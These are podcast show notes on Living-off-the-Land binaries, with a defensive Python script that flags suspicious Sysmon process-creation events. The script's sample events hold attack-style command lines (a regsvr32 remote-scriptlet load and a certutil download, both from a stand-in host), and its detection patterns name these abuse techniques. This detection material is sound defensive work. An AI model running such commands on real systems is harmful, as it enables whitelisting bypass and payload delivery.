Formerly the Brakeing Down Incident Response Podcast
Recorded Oct 2019
TOPIC: Laughing at Binaries - LOLBin/LOLBas
OUR GUEST WILL BE:
Oddvar Moe, Sr. Security Consultant TrustedSec - Red Teamer
@Oddvarmoe
Blog - https://oddvar.moe/
lolbas-project.com
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/api0cradle/PowerAL
OUR SPONSORS:
NEWS-WORTHY:
Cyber Security Awareness Month
Share something that can help SMBs, your family or friends
Flaw in sudo that lets a user run commands as root even when the sudoers rule is meant to deny it
Patch, patch, patch...
Microsoft Enables Tamper Protection by Default for all Windows 10 Users to Defend Against Attacks
Most Americans do not know what MFA is?
FBI warns that hackers are bypassing some types of 2FA
SITE-WORTHY:
Malware Archaeology logging tips - list of binaries to monitor
Guest - LolBin/LolBas - api0cradle - aka Oddvar Moe
TOOL-WORTHY:
HUMIO - Free 2GB/day 7 day retention
Guest:
https://github.com/PowerShellMafia/CimSweep - Matt Graeber - agentless host inspection using CIM/WMI
http://nirsoft.net/ (DLL Export Viewer, RegDllView, password recovery, network tools and more)
Get-InjectedThread by Jared Atkinson - https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
https://github.com/Neo23x0/sigma - standardized rule format and rule collection for SIEMs
MALWARE OF THE MONTH:
New Dridex version
Delivered via an Office document or an email with a URL
wscript/cscript downloads a malicious binary named Chrome.exe
Creates a scheduled task for persistence
Chrome.exe calls msra.exe for its communications
C:\Windows\syswow64\Msra.exe chrome.exe
So, another LOLBin? This is what prompted this episode
TOPIC OF THE DAY:
Laughing at Binaries - LOLBin/LOLBas
What is a LOLBin and LOLBas?
It stands for Living off the Land Binaries and Scripts
Libraries too, i.e. DLLs
What started all this?
@SubTee Casey Smith's application whitelisting bypass research from around 2015, where he found ways to use binaries already on the system to do bad things, such as RegSvr32, RegAsm, RunDll32 and several others
Why are these an issue for us Defenders?
Pentesters and red teams use them to get around security controls like AV, EDR and application whitelisting
Do these normally execute? If so, how noisy are they?
Some are noisy
What do we need to watch out for?
Command-line parameters are key
Look at which parameters these utilities are being executed with
Are there any lists people can use?
The Malware Archaeology logging page has a list and a link to Oddvar's LOLBAS page
What about security solutions, do we need to be concerned with these?
Yes, many AV and EDR products will not alert on these by default
You will need to build your own alerts and filter out the known-good noise
What about logging them?
Use the list(s) to build a lookup list that you can match against 4688 events (with command-line auditing enabled so the command line is logged) or Sysmon Event ID 1 (process create) and 7 (image load) events, and monitor the hits
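Worked example of that lookup-list approach, added here as an illustration; it is not code from the podcast, the LOLBAS project or Malware Archaeology. It takes Sysmon Event ID 1 records in the "Key: value" message text Sysmon writes, matches the image name against a watch list, checks the command line for the abuse parameters each utility is known for, and drops known-good command lines first. The watch-list patterns, the noise allow-list and all six event records are constructed for the example (the msra.exe record is modelled loosely on the Dridex item earlier in these notes), and every pattern needs tuning against your own baseline.

```python
"""Flag Living-off-the-Land binary use in Windows process-creation records.

Added illustration for the show notes; not code from the podcast, the LOLBAS
project or Malware Archaeology. Input is the "Key: value" message text Sysmon
writes for Event ID 1; the watch list, allow-list and sample events below are
constructed for this example and should be tuned against a real baseline.
"""
import re

# Lookup list: image name -> command-line patterns worth alerting on (regex, case-insensitive).
# An empty list means "alert on every execution" for binaries that rarely run on a workstation.
WATCHLIST = {
    "regsvr32.exe":  [r"/i:\s*https?://", r"scrobj\.dll"],        # remote scriptlet ("Squiblydoo")
    "rundll32.exe":  [r"javascript:", r"\\users\\", r"\\temp\\"],  # inline script or DLL from user paths
    "mshta.exe":     [r"https?://", r"(vb|j)script:"],             # remote HTA / inline script
    "certutil.exe":  [r"-urlcache", r"-decode", r"-encode"],       # downloader / decoder use
    "bitsadmin.exe": [r"/transfer"],                               # BITS download job
    "wscript.exe":   [r"https?://", r"\\appdata\\", r"\\temp\\"],
    "cscript.exe":   [r"https?://", r"\\appdata\\", r"\\temp\\"],
    "msra.exe":      [],                                           # flag every run
}

# Known-good command lines to drop before alerting (the "filter out the good/noise" step).
# Constructed example: installers silently registering a DLL that lives in System32.
NOISE_ALLOW = [
    re.compile(r'^"?c:\\windows\\system32\\regsvr32\.exe"? /s "?c:\\windows\\system32\\[^\\]+\.dll"?$', re.I),
]

FIELD_RE = re.compile(r"^(\w+):\s?(.*)$")


def parse_sysmon_event(text):
    """Turn the 'Key: value' lines of a Sysmon message body into a dict."""
    event = {}
    for line in text.strip().splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            event[m.group(1)] = m.group(2).strip()
    return event


def image_name(path):
    """Lower-cased file name of an image path, so C:\\Windows\\SysWOW64\\Msra.exe -> msra.exe."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Findings for one process-creation event as (image, reason) tuples; empty list = nothing to report."""
    image = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if image not in WATCHLIST:
        return []
    if any(rule.match(cmd) for rule in NOISE_ALLOW):
        return []
    patterns = WATCHLIST[image]
    if not patterns:
        return [(image, "execution of watch-listed binary")]
    return [(image, f"command line matched /{pat}/") for pat in patterns if re.search(pat, cmd, re.I)]


def scan(raw_events):
    """Run the lookup over raw Sysmon messages and return one record per event that produced findings."""
    results = []
    for raw in raw_events:
        ev = parse_sysmon_event(raw)
        hits = evaluate(ev)
        if hits:
            results.append({"image": ev.get("Image"), "parent": ev.get("ParentImage"),
                            "cmd": ev.get("CommandLine"), "hits": hits})
    return results


# Constructed Sysmon Event ID 1 messages, trimmed to the fields used here.
SAMPLE_EVENTS = [
    r"""Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32.exe /s /n /u /i:http://example.invalid/run.sct scrobj.dll
ParentImage: C:\Windows\System32\cmd.exe""",
    # Benign: an installer registering a System32 DLL, dropped by the allow-list.
    r"""Image: C:\Windows\System32\regsvr32.exe
CommandLine: "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\System32\msxml3.dll"
ParentImage: C:\Windows\System32\msiexec.exe""",
    # Benign: Control Panel applet launched via rundll32, no pattern matches.
    r"""Image: C:\Windows\System32\rundll32.exe
CommandLine: "C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL
ParentImage: C:\Windows\explorer.exe""",
    r"""Image: C:\Windows\System32\wscript.exe
CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice.js"
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE""",
    # Modelled loosely on the Dridex item in the notes: msra.exe is rare enough to flag on sight.
    r"""Image: C:\Windows\SysWOW64\msra.exe
CommandLine: C:\Windows\syswow64\Msra.exe chrome.exe
ParentImage: C:\Users\alice\AppData\Roaming\Chrome.exe""",
    r"""Image: C:\Windows\System32\certutil.exe
CommandLine: certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt
ParentImage: C:\Windows\System32\cmd.exe""",
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"[!] {r['image']}  (parent: {r['parent']})\n    {r['cmd']}")
        for _, why in r["hits"]:
            print(f"    - {why}")
```

Running it reports four of the six events: the regsvr32 scriptlet load, the wscript launch from a temp directory, the msra.exe run and the certutil download; the two benign events pass through silently. For Security 4688 the same logic applies with the "New Process Name" and "Process Command Line" fields, and the command line is only present when process-creation command-line auditing is turned on. Sysmon Event ID 7 (image load) can feed the same watch list using its ImageLoaded field, for instance regsvr32.exe loading scrobj.dll, which this example does not cover.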
What about MITRE ATT&CK, do they reference these?
Yes, many of these are referenced in MITRE ATT&CK, so map your tools and detections to ATT&CK techniques
Are there ways to test for these LOLBins?
What else do people need to watch out for?
Other Articles:
-------------------
Casey Smith @SubTee - Red Canary
Bypassing Application Whitelisting
SHMOOCon 2015 -
SANS
DerbyCon 2016 -
DerbyCon 2019 -
Oddvar Moe talk on LOLBin at DerbyCon 2018
Alternate Data Streams: